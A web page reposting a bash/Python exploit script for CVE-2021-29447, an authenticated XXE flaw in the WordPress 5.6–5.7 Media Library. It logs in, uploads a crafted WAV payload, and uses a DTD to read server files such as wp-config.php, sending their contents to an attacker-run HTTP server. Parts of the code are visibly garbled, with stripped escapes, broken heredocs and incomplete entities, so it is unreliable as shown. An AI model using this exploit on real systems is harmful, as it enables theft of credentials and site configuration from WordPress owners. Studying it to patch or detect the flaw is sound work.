Exploit/Advisories no image

Published on September 21st, 2021 📆 | 7479 Views ⚑

0

WordPress 5.7 Media Library XML Injection – Torchsec

[*]

# Exploit Title: WordPress 5.7 – ‘Media Library’ XML External Entity Injection (XXE) (Authenticated)
# Date: 16/09/2021
# Exploit Author: David Utón (M3n0sD0n4ld)
# Vendor Homepage: https://wordpress.com
# Affected Version: WordPress 5.6-5.7 & PHP8
# Tested on: Linux Ubuntu 18.04.5 LTS
# CVE : CVE-2021-29447

#!/bin/bash

# Author: @David_Uton (m3n0sd0n4ld)
# Usage: $./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST
# Example: $ ./CVE-2021-29447.sh 10.10.XX.XX wptest test ../wp-config.php 10.11.XX.XX

# Variables
rHost=$1
username=$2
password=$3
readFile=$4
lHost=$5

# Functions
# Logotype
logoType(){
echo “
=====================================
CVE-2021-29447 – WordPress 5.6-5.7 – XXE & SSRF Within the Media Library (Authenticated)
————————————-
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
=====================================”
}

# Create wav malicious
wavCreate(){
echo -en “RIFFxb8x00x00x00WAVEiXMLx7bx00x00x00< ?xml version='1.0'?>< !DOCTYPE ANY[%remote;%init;%trick;]>x00″ > payload.wav && echo “[+] Create payload.wav”
}

# Create xx3.dtd
dtdCreate(){
cat < xx3.dtd
< !ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=$readFile">
< !ENTITY % init "” >
EOT
}

# wav upload
wavUpload(){
cat < .upload.py
#/usr/bin/env python3

import requests, re, sys

postData = {
‘log’:”$username”,
‘pwd’:”$password”,
‘wp-submit’:’Log In’,
‘redirect_to’:’http://$rHost/wp-admin/’,
‘testcookie’:1
}

r = requests.post(‘http://$rHost/wp-login.php’,data=postData, verify=False) # SSL == verify=True

cookies = r.cookies

print(“[+] Getting Wp Nonce … “)

res = requests.get(‘http://$rHost/wp-admin/media-new.php’,cookies=cookies)
wp_nonce_list = re.findall(r’name=”_wpnonce” value=”(w+)”‘,res.text)

if len(wp_nonce_list) == 0 :
print(“[-] Failed to retrieve the _wpnonce”)
exit(0)
else :
wp_nonce = wp_nonce_list[0]
print(“[+] Wp Nonce retrieved successfully ! _wpnonce : ” + wp_nonce)

print(“[+] Uploading the wav file … “)

postData = {
‘name’: ‘payload.wav’,
‘action’: ‘upload-attachment’,
‘_wpnonce’: wp_nonce
}

wav = {‘async-upload’: (‘payload.wav’, open(‘payload.wav’, ‘rb’))}
r_upload = requests.post(‘http://$rHost/wp-admin/async-upload.php’, data=postData, files=wav, cookies=cookies)
if r_upload.status_code == 200:
image_id = re.findall(r'{“id”:(d+),’,r_upload.text)[0]
_wp_nonce=re.findall(r'”update”:”(w+)”‘,r_upload.text)[0]
print(‘[+] Wav uploaded successfully’)
else :
print(“[-] Failed to receive a response for uploaded! Try again . n”)
exit(0)
EOT
python3 .upload.py
}

# Server Sniffer
serverSniffer(){
statusServer=$(python3 -m http.server &> http.server.log & echo $! > http.server.pid)
}

# Load file and decoder
loadFile(){
content=”http.server.log”
wavUpload

while :
do
if [[ -s $content ]]; then
echo “[+] Obtaining file information…”
sleep 5s # Increase time if the server is slow

base64=$(cat $content | grep -i ‘?p=’ | cut -d ‘=’ -f2 | cut -d ‘ ‘ -f1 | sort -u)

# Check file exists
echo “< ?php echo zlib_decode(base64_decode('$base64')); ?>” > decode.php
sizeCheck=$(wc -c decode.php | awk ‘{printf $1}’)
if [[ $sizeCheck -gt “46” ]]; then
php decode.php
else
echo “[!] File does not exist or is not allowed to be read.”
fi
break
fi
done
}

# Cleanup
cleanup(){
kill $(cat http.server.pid) &>/dev/null
rm http.server.log http.server.pid &>/dev/null
rm xx3.dtd payload.wav .upload.py decode.php .cookies.tmp &>/dev/null
}

# Execute
logoType

# Checking parameters
if [[ $# -ne 5 ]];then
echo “[!] Parameters are missing!!!”
echo “”
echo “$ ./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST”
else

# Test Connection…
echo “[*] Test connection to WordPress…”

# WP Auth
authCheck=$(curl -i -s -k -X $’POST’
-H “Host: $rHost” -H $’User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0′ -H $’Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8′ -H $’Accept-Language: en-US,en;q=0.5′ -H $’Accept-Encoding: gzip, deflate’ -H “Referer: http://$rHost/wp-login.php” -H $’Content-Type: application/x-www-form-urlencoded’ -H $’Content-Length: 79′ -H “Origin: http://$rHost” -H $’Connection: close’ -H $’Upgrade-Insecure-Requests: 1′
-b $’wordpress_test_cookie=WP%20Cookie%20check’
–data-binary “log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1”
“http://$rHost/wp-login.php” > .cookies.tmp)

auth=$(head -n 1 .cookies.tmp | awk ‘{ printf $2 }’)

# Running authentication with WordPress.

if [[ $auth != “302” ]]; then
echo “[-] Authentication failed ! Check username and password”
else
echo “[+] Authentication successfull!!!”

# Create wav & dtd file
wavCreate
dtdCreate
serverSniffer
loadFile
cleanup
fi
fi

[*]Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *